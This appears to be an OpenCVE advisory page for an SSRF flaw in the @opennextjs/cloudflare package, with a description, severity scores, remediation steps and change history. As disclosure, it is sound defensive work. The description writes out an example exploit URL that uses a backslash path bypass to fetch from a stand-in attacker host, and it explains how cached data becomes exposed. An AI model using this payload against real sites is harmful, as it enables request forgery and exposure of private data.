Description
A Server-Side Request Forgery (SSRF) vulnerability was identified in the @opennextjs/cloudflare package, resulting from a path normalization bypass in the /cdn-cgi/image/ handler.The @opennextjs/cloudflare worker template includes a /cdn-cgi/image/ handler intended for development use only. In production, Cloudflare's edge intercepts /cdn-cgi/image/ requests before they reach the Worker. However, by substituting a backslash for a forward slash (/cdn-cgi\image/ instead of /cdn-cgi/image/), an attacker can bypass edge interception and have the request reach the Worker directly. The JavaScript URL class then normalizes the backslash to a forward slash, causing the request to match the handler and trigger an unvalidated fetch of arbitrary remote URLs.

For example:

https://victim-site.com/cdn-cgi\image/aaaa/https://attacker.com

In this example, attacker-controlled content from attacker.com is served through the victim site's domain (victim-site.com), violating the same-origin policy and potentially misleading users or other services.

Note: This bypass only works via HTTP clients that preserve backslashes in paths (e.g., curl --path-as-is). Browsers normalize backslashes to forward slashes before sending requests.

Additionally, Cloudflare Workers with Assets and Cloudflare Pages suffer from a similar vulnerability. Assets stored under /cdn-cgi/ paths are not publicly accessible under normal conditions. However, using the same backslash bypass (/cdn-cgi\... instead of /cdn-cgi/...), these assets become publicly accessible. This could be used to retrieve private data. For example, Open Next projects store incremental cache data under /cdn-cgi/_next_cache, which could be exposed via this bypass.
Published: 2026-03-04
Score: 7.7 High
EPSS: < 1% Very Low
KEV: No
Impact: Remote Server‑Side Request Forgery that allows arbitrary content to be fetched and served through the victim domain, exposing private data and violating the same‑origin policy
Action: Apply Patch
AI Analysis

Impact

A Server‑Side Request Forgery flaw exists in the @opennextjs/cloudflare adapter for Cloudflare Workers. By replacing the forward slash in the /cdn‑cgi/image/ path with a backslash, the Cloudflare edge layer bypasses its request filtering and the backslash is normalized by JavaScript’s URL class, enabling an attacker to trigger an unvalidated fetch of any remote URL. The retrieved content is then served through the victim’s domain, breaking the same‑origin policy and potentially allowing malicious payloads or sensitive data to be displayed or further accessed by downstream services. The same bypass also exposes previously protected assets under /cdn‑cgi/ paths, such as the cached data stored under /cdn‑cgi/_next_cache in Open Next projects.

Affected Systems

Installed versions of the @opennextjs/cloudflare Node.js package are vulnerable; it is inferred that any deployment using a version older than the patched release 1.17.1 is affected. The flaw also impacts Cloudflare Workers, Pages, and Assets environments that expose /cdn‑cgi/ paths, including the cache stored under /cdn‑cgi/_next_cache in Open Next projects.

Risk and Exploitability

The flaw carries a CVSS v3.1 score of 7.7, marking it as high severity. The EPSS probability is less than 1%, indicating a low likelihood of exploitation. The vulnerability is not listed in CISA’s KEV catalog. Attackers can exploit the bypass using HTTP clients that preserve backslashes, such as curl with the --path-as-is option; this limits the vector to non-browser clients but still permits automated or scripted attacks that could exfiltrate data or serve malicious content through the victim’s domain.

Generated by OpenCVE AI on April 18, 2026 at 10:00 UTC.

Remediation

Vendor Solution

Server-side updates to Cloudflare's Workers platform to block backslash path normalization bypasses for /cdn-cgi requests. The update automatically mitigates the issue for all existing and any future sites deployed to Cloudflare Workers.

OpenCVE Recommended Actions

  • Update the @opennextjs/cloudflare adapter to version 1.17.1 or later, which includes the root‑cause fix that prevents the backslash normalization bypass.
  • Deploy Cloudflare’s platform update that blocks backslash path normalization bypasses for /cdn‑cgi requests, ensuring all existing and future sites on Cloudflare Workers are protected.
  • Remove or disable any development‑only /cdn‑cgi/* handlers from production deployments, or implement strict whitelist checks on remote URLs before fetching to mitigate SSRF.

Generated by OpenCVE AI on April 18, 2026 at 10:00 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-c7mq-gh6q-6q7c opennextjs-cloudflare has SSRF vulnerability via /cdn-cgi/ path normalization bypass
History

Mon, 09 Mar 2026 18:00:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:opennextjs:opennext_for_cloudflare:*:*:*:*:*:node.js:*:*
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}

Thu, 05 Mar 2026 09:15:00 +0000

Type Values Removed Values Added
First Time appeared Opennextjs
Opennextjs opennext For Cloudflare
Vendors & Products Opennextjs
Opennextjs opennext For Cloudflare

Wed, 04 Mar 2026 19:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Wed, 04 Mar 2026 18:30:00 +0000

Type Values Removed Values Added
Description A Server-Side Request Forgery (SSRF) vulnerability was identified in the @opennextjs/cloudflare package, resulting from a path normalization bypass in the /cdn-cgi/image/ handler.The @opennextjs/cloudflare worker template includes a /cdn-cgi/image/ handler intended for development use only. In production, Cloudflare's edge intercepts /cdn-cgi/image/ requests before they reach the Worker. However, by substituting a backslash for a forward slash (/cdn-cgi\image/ instead of /cdn-cgi/image/), an attacker can bypass edge interception and have the request reach the Worker directly. The JavaScript URL class then normalizes the backslash to a forward slash, causing the request to match the handler and trigger an unvalidated fetch of arbitrary remote URLs. For example: https://victim-site.com/cdn-cgi\image/aaaa/https://attacker.com In this example, attacker-controlled content from attacker.com is served through the victim site's domain (victim-site.com), violating the same-origin policy and potentially misleading users or other services. Note: This bypass only works via HTTP clients that preserve backslashes in paths (e.g., curl --path-as-is). Browsers normalize backslashes to forward slashes before sending requests. Additionally, Cloudflare Workers with Assets and Cloudflare Pages suffer from a similar vulnerability. Assets stored under /cdn-cgi/ paths are not publicly accessible under normal conditions. However, using the same backslash bypass (/cdn-cgi\... instead of /cdn-cgi/...), these assets become publicly accessible. This could be used to retrieve private data. For example, Open Next projects store incremental cache data under /cdn-cgi/_next_cache, which could be exposed via this bypass.
Title SSRF vulnerability in opennextjs-cloudflare via /cdn-cgi/ path normalization bypass
Weaknesses CWE-706
CWE-918
References
Metrics cvssV4_0

{'score': 7.7, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:H/SI:N/SA:N'}

Subscriptions

Opennextjs Opennext For Cloudflare
cve-icon MITRE

Status: PUBLISHED

Assigner: cloudflare

Published:

Updated: 2026-03-04T18:58:56.614Z

Reserved: 2026-02-24T14:15:54.385Z

Link: CVE-2026-3125

cve-icon Vulnrichment

Updated: 2026-03-04T18:58:46.967Z

cve-icon NVD

Status : Analyzed

Published: 2026-03-04T19:16:19.730

Modified: 2026-03-09T17:51:18.853

Link: CVE-2026-3125

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-18T10:15:25Z

Weaknesses